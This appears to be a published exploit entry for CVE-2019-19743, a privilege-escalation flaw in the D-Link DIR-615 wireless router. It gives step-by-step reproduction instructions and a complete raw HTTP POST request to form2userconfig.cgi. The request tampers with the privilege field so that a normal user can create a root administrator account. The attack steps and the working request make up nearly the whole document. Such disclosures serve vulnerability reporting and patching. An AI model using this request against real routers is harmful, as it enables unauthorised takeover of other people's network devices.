D-Link DIR-615 Wireless Router - Privilege Escalation

1. ######################################################################################
2.  
3. # Exploit Title: D-Link DIR-615 — Vertical Prviliege Escalation
4. # Date: 10.12.2019
5. # Exploit Author: Sanyam Chawla
6. # Vendor Homepage: http://www.dlink.co.in
7. # Category: Hardware (Wi-fi Router)
8. # Hardware Link: http://www.dlink.co.in/products/?pid=678
9. # Hardware Version: T1
10. # Firmware Version: 20.07
11. # Tested on: Windows 10 and Kali linux
12. # CVE: CVE-2019–19743
13.  
14. #######################################################################################
15.  
16.  
17. Reproduction Steps:
18.  
19. 1 Login to your wi-fi router gateway with normal user credentials [i.e: http://192.168.0.1]
20. 2 Go to the Maintenance page and click on Admin on the left panel.
21. 3 There is an option to create a user and by default, it shows only user accounts.
22. 4 Create an account with a name(i.e ptguy) and change the privileges from user to root(admin) by changing privileges id with burp suite.
23.  
24. Privilege Escalation Post Request
25.  
26. POST /form2userconfig.cgi HTTP/1.1
27. Host: 192.168.0.1
28. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
29. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
30. Accept-Language: en-US,en;q=0.5
31. Accept-Encoding: gzip, deflate
32. Content-Type: application/x-www-form-urlencoded
33. Content-Length: 122
34. Origin: http://192.168.0.1
35. Connection: close
36. Referer: http://192.168.0.1/userconfig.htm
37. Cookie: SessionID=
38. Upgrade-Insecure-Requests: 1
39.  
40. username=ptguy&privilege=2&newpass=pentesting&confpass=pentesting&adduser=Add&hiddenpass=&submit.htm%3Fuserconfig.htm=Send
41.  
42.  
43. 5. Now log in with newly created root (ptguy) user. You have all administrator rights.
44.  
45.  
46.  
47. #####################################################################################